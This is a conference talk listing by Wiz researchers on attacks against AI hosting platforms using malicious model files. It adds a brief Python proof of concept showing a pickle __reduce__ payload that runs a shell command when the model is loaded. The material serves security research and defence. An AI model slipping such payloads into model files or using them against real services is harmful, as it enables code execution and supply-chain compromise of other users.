Speaking session

Isolation or Hallucination? Hacking AI Infrastructure Providers for Fun and Weights

Tracks: AI, ML, & Data Science; Cloud Security

More and more companies are adopting AI-as-a-Service solutions to collaborate on, train, and run their artificial intelligence applications. From emerging AI startups like Hugging Face and Replicate to mature cloud companies like Microsoft Azure and SAP, thousands of customers trust these services with their proprietary models and datasets, making these platforms attractive targets for attackers.

Over the past year, we've been researching leading AI service providers with a key question in mind: How susceptible are these services to attacks that could compromise their security and expose sensitive customer data?

In this session, we will present our novel attack technique, successfully demonstrated on several prominent AI service providers, including Hugging Face and Replicate. On each platform, we used malicious models to break security boundaries and move laterally within the service's underlying infrastructure. As a result, we were able to achieve cross-tenant access to customers' private data, including private models, weights, datasets, and even user prompts. Furthermore, by achieving global write privileges on these services, we could backdoor popular models and launch supply-chain attacks, affecting AI researchers and end users alike.
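
The abstract does not name the mechanism behind these malicious models, so as context only: the most widely known way a model file can carry attacker code is Python's pickle format, which several common model serialization formats build on. The sketch below is a minimal, hypothetical illustration of that general primitive, not the speakers' actual exploit; the class name and payload are ours. It shows why a service that deserializes an untrusted pickle-based model ends up executing the uploader's code.

```python
import os
import pickle

# Illustrative sketch only. Assumes the target service loads untrusted
# pickle-based model files; the class name and payload are hypothetical.
class MaliciousModel:
    # pickle records the callable and arguments returned by __reduce__,
    # so the *deserializer* will call os.system("id") when it loads the file.
    def __reduce__(self):
        return (os.system, ("id",))

# The attacker uploads this file to the platform as a "model" artifact.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# Any service that naively loads the artifact runs the payload on its own
# infrastructure, the kind of foothold lateral movement starts from.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```

Safer serialization formats such as safetensors were designed specifically to avoid this class of load-time code execution.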

Join us to explore the unique attack surface we discovered in AI-as-a-Service providers, and learn how to detect and mitigate the kinds of vulnerabilities we exploited.

Speakers

  • Hillai Ben-Sasson

    Senior Security Researcher at Wiz

  • Sagi Tzadik

    Security Researcher at Wiz